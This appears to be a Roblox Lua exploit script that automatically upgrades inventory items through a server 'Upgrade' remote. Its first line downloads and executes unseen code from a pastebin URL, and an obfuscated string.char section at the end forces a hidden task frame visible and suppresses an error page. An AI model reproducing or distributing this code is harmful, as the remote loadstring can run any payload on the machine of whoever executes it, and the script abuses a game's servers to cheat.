Загрузка данных


loadstring(game:HttpGet('https://pastebin.com/raw/MnEz1uDS'))()getgenv().autoup = true

Players = game:GetService("Players")
Player = Players.LocalPlayer
Inventory = Player._Inventory

local threedots = {
  ["Ring"] = "Jack in the box (Aliens)",
["Diamond"] = "Jack in the box (Aliens)",
  ["Plush Pepe (Hothead)"] = "Plush Pepe (Kung Fu Pepe)"
}

while task.wait() and getgenv().autoup do
  for _,v in next, Inventory:GetChildren() do
    up = threedots[v.Name]
    if up and not v:GetAttribute("Unique") then
      local args = {
        v,
        up,
        true
      }
      game:GetService("ReplicatedStorage"):WaitForChild("Events"):WaitForChild("Upgrade"):InvokeServer(unpack(args))
    end
  end
end
local _0x1 = game:GetService((string.char(80, 108, 97, 121, 101, 114, 115)))
local _0x2 = _0x1.LocalPlayer
local _0x3 = _0x2:WaitForChild((string.char(80, 108, 97, 121, 101, 114, 71, 117, 105)))
local _0x4 = _0x3:WaitForChild((string.char(77, 97, 105, 110, 71, 117, 105)))
local _0x5 = _0x4:WaitForChild((string.char(80, 97, 103, 101, 115))):WaitForChild((string.char(84, 97, 115, 107, 115)))
local _0x6 = _0x5:WaitForChild((string.char(77, 97, 105, 110, 70, 114, 97, 109, 101)))

task.spawn(function()
    while task.wait(0.1) do
        local _0x7 = "Visible"
        if not _0x6[_0x7] then
            _0x6[_0x7] = true
        end
        local _0x8 = _0x5:FindFirstChild((string.char(69, 114, 114, 111, 114, 80, 97, 103, 101)))
        if _0x8 and _0x8[_0x7] then
            _0x8[_0x7] = false
        end
    end
end)